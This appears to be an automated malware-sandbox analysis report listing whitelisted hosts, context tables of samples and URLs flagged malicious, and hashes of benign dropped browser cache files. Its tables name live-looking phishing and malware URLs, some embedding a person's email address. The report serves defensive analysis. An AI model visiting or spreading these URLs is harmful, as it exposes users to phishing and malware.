Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 104.108.39.131, 204.79.197.203, 204.79.197.200, 13.107.21.200, 92.122.213.187, 92.122.213.231, 65.55.44.109, 104.84.56.24, 131.253.33.203, 51.104.139.180, 152.199.19.161, 52.155.217.156, 51.103.5.186, 20.54.26.129, 92.122.213.247, 92.122.213.194, 23.210.248.85 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a-0003.dc-msedge.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, go.microsoft.com, emea1.notify.windows.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, db3p-ris-pf-prod-atm.trafficmanager.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, global.vortex.data.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
87.248.118.22	http://us.i1.yimg.com	Get hash	malicious	Browse	us.i1.yimg.com/favicon.ico
	http://www.prophecyhour.com	Get hash	malicious	Browse	us.i1.yimg.com/us.yimg.com/i/yg/img/i/us/ui/join.gif
	http://t.eservices-laposte.fr/TrackActions/NzA0YmE3MTRiOTg4NGEyM2E4Njc4ZDIyNGVjNmJmMTYzMDQxMzhmZTVjNzEyMDU2OTMxM2JkODcxMDUzMmYxY2ZlZWFjODU5ZDUyYzM3MGQxNzM2YTU1NjRlOTA0YWUzZmY4Mjc4MDQ2YWMzY2ZkZDA5MWQ0MWE0OWJmODc4NWM2ZDA2YWI4MmJmYmRkNGNjZTQyNmRlZjRkNjMyM2NmNTUyM2FlZDI5NmVjM2UzMmUyZThhMjEwMzk0MzYxMzI1MmExZjBiMmU5ZWNjMDg0OTY3YTZhYWZkOTMzMGQxZWI0YjBkZmM1MjBkNzQyM2QzMTY4MjgyOTJjM2QwZGUxZmVkZTU1MjhiZTE5YjdhY2MwNTQ0ZjdkMGJmODNjNzYwODY2ODY5M2RhZjgwMjAzMzcxNzM5MjBjM2QxOTI0MzQ5ODhhMGNlNWYwNjlmZGY5YjcwNDQ0ZGQ4MjM3ZGM0Njk4M2U0MWRjYjE0ZTRiNDk3NWM1MDAyYjYxZGIzMGI2NzllMjg4ZTYxNjhlZWViYzM1ZDcwNDJhYjg4NjhlNTA5NjAyZTc3MTJkODExM2NhZGRiYTYwM2Y3NDRmNmY5MDY5MTU0N2I3NGE1MzhiMzA5OGFhYmVjZjJkN2VhNDQzMjljNzM5MWU1ODM1ZDg1YzViYjVmODMzZGNmYWRmODc3MGM3MTZkZGU2ZjFkYWU4NTNlNGQ0OTFkYTM5ZmQzOA	Get hash	malicious	Browse	yui.yahooapis.com/3.4.1/build/yui/yui-min.js
	http://www.knappassociatesinc.com	Get hash	malicious	Browse	www.flickr.com/photos/knappassociatesinc/
	https://skphysiotherapy.ca/FEDWIRE/	Get hash	malicious	Browse	cookiex.ngd.yahoo.com/ack?xid=E0&eid=XjSTxQAAAemDVVL0
	Doc.htm	Get hash	malicious	Browse	l.yimg.com/a/i/ww/met/yahoo_logo_us_061509.png
13.224.89.96	http://www.martialtalk.com/threads/a-day-with-ron-chapel.27329/	Get hash	malicious	Browse
151.101.1.44	c0nnect1on.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKD.35280757.18070.dll	Get hash	malicious	Browse
	robertophotopng.dll	Get hash	malicious	Browse
	noosbt.dll	Get hash	malicious	Browse
	temp.dll	Get hash	malicious	Browse
	W0rd.dll	Get hash	malicious	Browse
	gkd9jtb9zpng.dll	Get hash	malicious	Browse
	0pz1on1.dll	Get hash	malicious	Browse
	dVcML4Zl0J.dll	Get hash	malicious	Browse
	0pz1on1.dll	Get hash	malicious	Browse
	https://svlxltppmh.objects-us-east-1.dream.io/link.html#qs=r-aggieaidcjkdfieaefhkbhbaekgeckfaehehfabababackadbbaccacbidacfheaiebhiacb	Get hash	malicious	Browse
	sentinel.dll	Get hash	malicious	Browse
	fasm.dll	Get hash	malicious	Browse
	1.dll	Get hash	malicious	Browse
	74b8bbe22ee44997019c42ec4060592d.dll	Get hash	malicious	Browse
	960.dll	Get hash	malicious	Browse
	opzi0n1.dll	Get hash	malicious	Browse
	opzi0n1.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Mikey.116755.11070.dll	Get hash	malicious	Browse
	fasm.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
contextual.media.net	c0nnect1on.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Trojan.GenericKD.35280757.18070.dll	Get hash	malicious	Browse	2.18.68.31
	robertophotopng.dll	Get hash	malicious	Browse	104.84.56.24
	noosbt.dll	Get hash	malicious	Browse	92.122.146.68
	temp.dll	Get hash	malicious	Browse	92.122.146.68
	W0rd.dll	Get hash	malicious	Browse	2.18.68.31
	gkd9jtb9zpng.dll	Get hash	malicious	Browse	2.18.68.31
	0pz1on1.dll	Get hash	malicious	Browse	23.54.113.52
	dVcML4Zl0J.dll	Get hash	malicious	Browse	23.54.113.52
	0pz1on1.dll	Get hash	malicious	Browse	23.54.113.52
	https://svlxltppmh.objects-us-east-1.dream.io/link.html#qs=r-aggieaidcjkdfieaefhkbhbaekgeckfaehehfabababackadbbaccacbidacfheaiebhiacb	Get hash	malicious	Browse	2.18.68.31
	sentinel.dll	Get hash	malicious	Browse	104.84.56.24
	fasm.dll	Get hash	malicious	Browse	104.84.56.24
	1.dll	Get hash	malicious	Browse	92.122.146.68
	https://beachrentalgroup.com/sgtitle/Doc.htm	Get hash	malicious	Browse	2.18.68.31
	74b8bbe22ee44997019c42ec4060592d.dll	Get hash	malicious	Browse	2.18.68.31
	960.dll	Get hash	malicious	Browse	104.84.56.24
	opzi0n1.dll	Get hash	malicious	Browse	92.122.146.68
	opzi0n1.dll	Get hash	malicious	Browse	92.122.146.68
	https://rebrand.ly/we9zn	Get hash	malicious	Browse	2.20.86.97
tls13.taboola.map.fastly.net	c0nnect1on.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.GenericKD.35280757.18070.dll	Get hash	malicious	Browse	151.101.1.44
	robertophotopng.dll	Get hash	malicious	Browse	151.101.1.44
	noosbt.dll	Get hash	malicious	Browse	151.101.1.44
	temp.dll	Get hash	malicious	Browse	151.101.1.44
	W0rd.dll	Get hash	malicious	Browse	151.101.1.44
	gkd9jtb9zpng.dll	Get hash	malicious	Browse	151.101.1.44
	0pz1on1.dll	Get hash	malicious	Browse	151.101.1.44
	dVcML4Zl0J.dll	Get hash	malicious	Browse	151.101.1.44
	0pz1on1.dll	Get hash	malicious	Browse	151.101.1.44
	https://svlxltppmh.objects-us-east-1.dream.io/link.html#qs=r-aggieaidcjkdfieaefhkbhbaekgeckfaehehfabababackadbbaccacbidacfheaiebhiacb	Get hash	malicious	Browse	151.101.1.44
	sentinel.dll	Get hash	malicious	Browse	151.101.1.44
	fasm.dll	Get hash	malicious	Browse	151.101.1.44
	1.dll	Get hash	malicious	Browse	151.101.1.44
	74b8bbe22ee44997019c42ec4060592d.dll	Get hash	malicious	Browse	151.101.1.44
	opzi0n1.dll	Get hash	malicious	Browse	151.101.1.44
	opzi0n1.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Variant.Mikey.116755.11070.dll	Get hash	malicious	Browse	151.101.1.44
	fasm.dll	Get hash	malicious	Browse	151.101.1.44
	https://www.women.com/alexa/quiz-dialect-test	Get hash	malicious	Browse	151.101.1.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	c0nnect1on.dll	Get hash	malicious	Browse	13.224.89.175
	https://quip.com/Vrk5AwJuoYZl/Secure-Message-Notification	Get hash	malicious	Browse	13.224.198.53
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ftemprazin.mydoctorfinder.com%2fpublic%2fcss%2fphotos%2fWebmail.php%23karen.stubblefield%40goodmanmfg.com&c=E,1,wwJb8YAwmsmx-fy1Q-8KQuozxQzenGXVc9I6CsCci7XUUz_efHpKOCRzLpTknL6x_JFXYgEgctTDyPcPFvECe8VPId0IdnwUZDdYIiEBdYJSyQ,,&typo=1	Get hash	malicious	Browse	35.156.29.60
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ftemprazin.mydoctorfinder.com%2fpublic%2fcss%2fphotos%2fWebmail.php%23karen.stubblefield%40goodmanmfg.com&c=E,1,7U4EkAwyFM5e3QBuCx3R2134DRUiXTYF9jCpa2ZGty04WHZ3wOj4Lmm9d-gJu9VWE0nJ9_IRm1wahzrwYVlk4_K7Dsyz5LAuIsWRmp5-stlzxVpCUEbNig,,&typo=1	Get hash	malicious	Browse	35.156.174.8
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	13.224.93.48
	Purchase Order 40,7045.exe	Get hash	malicious	Browse	13.248.196.204
	https://t.e.vailresorts.com/r/?id=hda0e43a,3501a2a,3501f68&VRI_v73=aGNob0BoYW5nbHVuZy5jb20=&cmpid=EML_SNOWALRT_OTHR_000_NW_00_00000_000000_000000_20200110_v01&p1=www.snow.com%40s-ay.xyz	Get hash	malicious	Browse	52.12.33.145
	Fennec Pharma .docx	Get hash	malicious	Browse	52.217.4.102
	activate_36059.EXE	Get hash	malicious	Browse	13.224.93.99
	Fennec Pharma.xlsx	Get hash	malicious	Browse	52.217.43.14
	https://albanesebros.sendx.io/lp/shared-doc.html	Get hash	malicious	Browse	13.224.93.76
	http://www.openair.com	Get hash	malicious	Browse	13.224.93.99
	https://faxfax.zizera.com/remittanceadvice	Get hash	malicious	Browse	34.255.187.247
	https://flyboyfurnishings.com/firstam/RD-FITT	Get hash	malicious	Browse	13.224.93.52
	http://webnavigator.co	Get hash	malicious	Browse	52.210.174.128
	https://mcmms.typeform.com/to/Vtnb9OBC	Get hash	malicious	Browse	13.224.93.121
	https://t.e.vailresorts.com/r/?id=hda0e43a,3501a2a,3501f68&VRI_v73=c2F1bWlsLnNoYWhAYXJtLmNvbQ==&cmpid=EML_SNOWALRT_OTHR_000_NW_00_00000_000000_000000_20200110_v01&p1=www.snow.com%40g-em.xyz	Get hash	malicious	Browse	52.12.33.145
	vOKMFxiCYt.exe	Get hash	malicious	Browse	3.138.72.189
	http://microsoftonlineofficeteam.weebly.com	Get hash	malicious	Browse	35.163.165.143
	ACH & WlRE REMlTTANCE ADVlCE.xlsx	Get hash	malicious	Browse	52.33.162.26
YAHOO-DEBDE	http://www.openair.com	Get hash	malicious	Browse	87.248.118.22
	SecuriteInfo.com.Trojan.GenericKD.35280757.18070.dll	Get hash	malicious	Browse	87.248.118.22
	robertophotopng.dll	Get hash	malicious	Browse	87.248.118.23
	temp.dll	Get hash	malicious	Browse	87.248.118.23
	https://t.e.vailresorts.com/r/?id=h1bac782d,59eb410,55e61f1&VRI_v73=96008558&cmpid=EML_OPENDAYS_RESO_000_OK_SR_REN1Y_000000_TG0001_20201118_V00_EX001_LOCA_ANN_00000_000	Get hash	malicious	Browse	87.248.118.23
	http://WWW.ALYSSA-J-MILANO.COM	Get hash	malicious	Browse	87.248.118.22
	gkd9jtb9zpng.dll	Get hash	malicious	Browse	87.248.118.23
	0pz1on1.dll	Get hash	malicious	Browse	87.248.118.22
	dVcML4Zl0J.dll	Get hash	malicious	Browse	87.248.118.22
	http://us.i1.yimg.com	Get hash	malicious	Browse	87.248.118.22
	https://beachrentalgroup.com/sgtitle/Doc.htm	Get hash	malicious	Browse	87.248.118.22
	opzi0n1.dll	Get hash	malicious	Browse	87.248.118.22
	opzi0n1.dll	Get hash	malicious	Browse	87.248.118.22
	http://f.zgbmw.com.cn	Get hash	malicious	Browse	87.248.118.23
	https://rebrand.ly/we9zn	Get hash	malicious	Browse	87.248.118.22
	https://www.women.com/alexa/quiz-dialect-test	Get hash	malicious	Browse	87.248.118.23
	http://technoraga.com/Doc.htm	Get hash	malicious	Browse	87.248.118.23
	dss.dll	Get hash	malicious	Browse	87.248.118.23
	fasm.dll	Get hash	malicious	Browse	87.248.118.23
	pDkFPnlBaF.dll	Get hash	malicious	Browse	87.248.118.23
FASTLYUS	c0nnect1on.dll	Get hash	malicious	Browse	151.101.1.44
	https://quip.com/Vrk5AwJuoYZl/Secure-Message-Notification	Get hash	malicious	Browse	151.101.2.110
	https://www.canva.com/design/DAEOEcu9Gnc/C6LvqPRfMOYoF6OWlu9bVg/view?utm_content=DAEOEcu9Gnc&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton	Get hash	malicious	Browse	151.101.1.195
	https://www.canva.com/design/DAEOEcu9Gnc/C6LvqPRfMOYoF6OWlu9bVg/view?utm_content=DAEOEcu9Gnc&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton	Get hash	malicious	Browse	151.101.1.195
	https://elharless.github.io/stamapdevmo/tak.html?bbre=oadfis48sd	Get hash	malicious	Browse	185.199.108.153
	https://flyboyfurnishings.com/firstam/RD-FITT	Get hash	malicious	Browse	151.101.1.192
	https://mcmms.typeform.com/to/Vtnb9OBC	Get hash	malicious	Browse	151.101.12.159
	http://microsoftonlineofficeteam.weebly.com	Get hash	malicious	Browse	151.101.1.46
	SecuriteInfo.com.Trojan.GenericKD.35280757.18070.dll	Get hash	malicious	Browse	151.101.1.44
	robertophotopng.dll	Get hash	malicious	Browse	151.101.1.44
	https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.php	Get hash	malicious	Browse	151.101.12.158
	noosbt.dll	Get hash	malicious	Browse	151.101.1.44
	temp.dll	Get hash	malicious	Browse	151.101.1.44
	https://verify-outlook-web.weebly.com/	Get hash	malicious	Browse	151.101.1.46
	https://app.box.com/s/mk1t9s05ty9ba7rvsdbstgc46rb4fod7	Get hash	malicious	Browse	151.101.2.109
	https://app.box.com/s/gdf36roak3w2fc52cgfbxuq651p0zehy	Get hash	malicious	Browse	151.101.130.109
	http://revitoped.blogspot.com/2013/11/view-reference-and-camera-location.html	Get hash	malicious	Browse	151.101.2.133
	http://WWW.ALYSSA-J-MILANO.COM	Get hash	malicious	Browse	151.101.0.238
	http://www.marcusevans.com	Get hash	malicious	Browse	151.101.14.109
	http://septterror.tripod.com/the911basics.html	Get hash	malicious	Browse	151.101.1.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	c0nnect1on.dll	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://j.mp/2QSLXwX	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ftemprazin.mydoctorfinder.com%2fpublic%2fcss%2fphotos%2fWebmail.php%23karen.stubblefield%40goodmanmfg.com&c=E,1,wwJb8YAwmsmx-fy1Q-8KQuozxQzenGXVc9I6CsCci7XUUz_efHpKOCRzLpTknL6x_JFXYgEgctTDyPcPFvECe8VPId0IdnwUZDdYIiEBdYJSyQ,,&typo=1	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ftemprazin.mydoctorfinder.com%2fpublic%2fcss%2fphotos%2fWebmail.php%23karen.stubblefield%40goodmanmfg.com&c=E,1,7U4EkAwyFM5e3QBuCx3R2134DRUiXTYF9jCpa2ZGty04WHZ3wOj4Lmm9d-gJu9VWE0nJ9_IRm1wahzrwYVlk4_K7Dsyz5LAuIsWRmp5-stlzxVpCUEbNig,,&typo=1	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://bit.ly/2IWXsDd?v0qp	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://www.canva.com/design/DAEOEcu9Gnc/C6LvqPRfMOYoF6OWlu9bVg/view?utm_content=DAEOEcu9Gnc&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://www.canva.com/design/DAEOEcu9Gnc/C6LvqPRfMOYoF6OWlu9bVg/view?utm_content=DAEOEcu9Gnc&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://t.e.vailresorts.com/r/?id=hda0e43a,3501a2a,3501f68&VRI_v73=aGNob0BoYW5nbHVuZy5jb20=&cmpid=EML_SNOWALRT_OTHR_000_NW_00_00000_000000_000000_20200110_v01&p1=www.snow.com%40s-ay.xyz	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	Fennec Pharma .docx	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://saadellefurniture.com.au/CD/out/	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	Fennec Pharma.xlsx	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://albanesebros.sendx.io/lp/shared-doc.html	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://xerox879784379923.azureedge.net??#ZGluYS5qb25nZWtyeWdAYWxhc2thYWlyLmNvbQ	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://flyboyfurnishings.com/firstam/RD-FITT	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	http://ec.autohonda.it	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	http://webnavigator.co	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	http://www.947947.mirramodaintima.com.br/#aHR0cHM6Ly9lbXl0dXJrLmNvbS9zZC9JSy9vZjEvRmlkZWwuVG9ycmVzQHNlYXJzaGMuY29t	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	https://t.e.vailresorts.com/r/?id=hda0e43a,3501a2a,3501f68&VRI_v73=c2F1bWlsLnNoYWhAYXJtLmNvbQ==&cmpid=EML_SNOWALRT_OTHR_000_NW_00_00000_000000_000000_20200110_v01&p1=www.snow.com%40g-em.xyz	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	http://microsoftonlineofficeteam.weebly.com	Get hash	malicious	Browse	87.248.118.22 151.101.1.44
	ACH & WlRE REMlTTANCE ADVlCE.xlsx	Get hash	malicious	Browse	87.248.118.22 151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\EQAWN5DV\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Reputation:	high, very likely benign file
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\IB42RK38\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2598
Entropy (8bit):	4.868227653185994
Encrypted:	false
SSDEEP:	48:y5gynynyNnynPnPPnPnPqnPnUnUnUanAnASnAnA7nAnAnAnAp2nAp29xc:83yyNyPPPPPqPUUUaAASAA7AAAAp2ApH
MD5:	EFAEB4E02AB91398492824786608E710
SHA1:	725EF816CB5FE788CE3E28E16991C2712B6E89D0
SHA-256:	CE4F87D41427797443831109CA62D5FE145D1103C8C2D7AEF6FC64CDA805A4A9
SHA-512:	8BEEE0DC2C9E4EF2C0785D258D798C3E789B59A2DC31B3CE22419EE25584A9469A9DD26868859BF85AF775B14694D1D1940663347C95509CEC53C3DA69E716B9
Malicious:	false
Reputation:	low
Preview:	<root><item name="mntest" value="mntest" ltime="2718955488" htime="30851522" /></root><root></root><root><item name="HBCM_BIDS" value="{}" ltime="2722275488" htime="30851522" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2722275488" htime="30851522" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2722275488" htime="30851522" /><item name="mntest" value="mntest" ltime="2722515488" htime="30851522" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2722275488" htime="30851522" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2722595488" htime="30851522" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2722595488" htime="30851522" /><item name="mntest" value="mntest" ltime="2722715488" htime="30851522" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2722595488" htime="30851522" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2722595488" htime="30851522" /><item name="mntest" value="mntest" ltime="2724675488" htime="30851522" /></root><r

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DCB21009-2DB5-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	67304
Entropy (8bit):	2.1155744226691318
Encrypted:	false
SSDEEP:	192:rMZDZq269WRtgfKtzLWVSgaWbWva2WstohKtBrkCbVJrBUCls:rMFJ6UjOC2VSgSvAstostFkUVJBk
MD5:	47FAC4D87B91614081A82A95AAD3DFE4
SHA1:	8151AC176D221CB5FCEF5CCCB5AF7A35FD82F41C
SHA-256:	838E988B492F7BE0F8FC5A1D7539E36FB08468A312A4427BCC2892B6FF89DF69
SHA-512:	469650C42E61305D5A211473E0E2552DAD208B1D255DAE9B74BB80E05D9536A0DD2D449398F4E95C074517C03989F93DDAA67F5190B74246BD4C2C6ECE1D7D6E
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DCB2100B-2DB5-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	193506
Entropy (8bit):	3.6045958727510383
Encrypted:	false
SSDEEP:	3072:B8iqZ/2Bfc6ru5rXfVStmiqZ/2BfcJru5rXfVSt2:/hf
MD5:	E8ADEABB3250BC52CE91B8183AB20D86
SHA1:	CD9E377C6020383035C45567C93E9C0E16FE5C2C
SHA-256:	FEF8DF67B9F8ECA05816C371654C57998BCA74F5398CDA16D087D7DB2A1D3D8B
SHA-512:	1B75C8BD1730C2EF659FC3A6C8D6648D50B4BB444D7D12C1E92558427D65B533DF54A3C0602C0B8693A8109D0A191FD4321229D92148875E304E4831655F1B0D
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DCB2100D-2DB5-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27296
Entropy (8bit):	1.8201361663079219
Encrypted:	false
SSDEEP:	192:r+ZtQt6bkiFjh2IkW8MrYqgzUnRgzUACKA:rKyYgihQM5rfgAgdW
MD5:	62D5104BC92FAF222F8ED8B8A1275ABB
SHA1:	ADDBBC59875B204F62790DD1976D7D4178D9BDDA
SHA-256:	BDFDABF5C9F88AE943C0EECE3A09A1F40C47F3CB9AA36C7390F806FBBDC34929
SHA-512:	DF4BCF23BD38D38D83F6B604500654D279D86581C945C2E907477B157077CF5038105F2B9F1D87E541C40B0FAF6034E8D54A71C212F09B9A018785CC3B5D8850
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F7335679-2DB5-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5994220698311534
Encrypted:	false
SSDEEP:	48:IwOGcprvGwpaEG4pQwGrapbS4rGQpBOGHHpc5sTGUpQZgGcpm:rSZZQ06OBS4Fjd25k66g
MD5:	CBFC0F9B7DA81637C643648EB431752A
SHA1:	64989EF8CE01E357265B789DAC97FD26DB19EE40
SHA-256:	4210C5ECB7D88850449DCDB77F46ED9CC07EE5C006D0303595DFA0F056F1B695
SHA-512:	E9F0C9DB38C475B6C8BE44F04D2EF4B685458B8A3F3F5047AD4B5C3B3FCA5102F8694C201904B000B19A7815D4F618463D22C75344B78D582296DA6A0BF280C7
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\wlm7n14\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	7.029141048506541
Encrypted:	false
SSDEEP:	24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGm:u6tWu/6symC+PTCq5TcBUX4bU
MD5:	566993FDDE80FFF1FC9E2A4CFC69154F
SHA1:	86A8B4C86ED28FC61F429A8B965DB4E8293622B5
SHA-256:	533E4B7933D023DA8BADBBF39FD0E6EC91A43760C94C499DE0B6336002249618
SHA-512:	B564222E8E3B576B088CE48C3D992861DEA17B14378C89B746113F14BE728448440EBFB2437704E0183C0B7E5374FB2FDF345529655EC7606B9A60400A0BB7A2
Malicious:	false
Reputation:	low
Preview:	E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... .............._......._....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\41-0bee62-68ddb2ab[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1238
Entropy (8bit):	5.066474690445609
Encrypted:	false
SSDEEP:	24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
MD5:	7ADA9104CCDE3FDFB92233C8D389C582
SHA1:	4E5BA29703A7329EC3B63192DE30451272348E0D
SHA-256:	F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
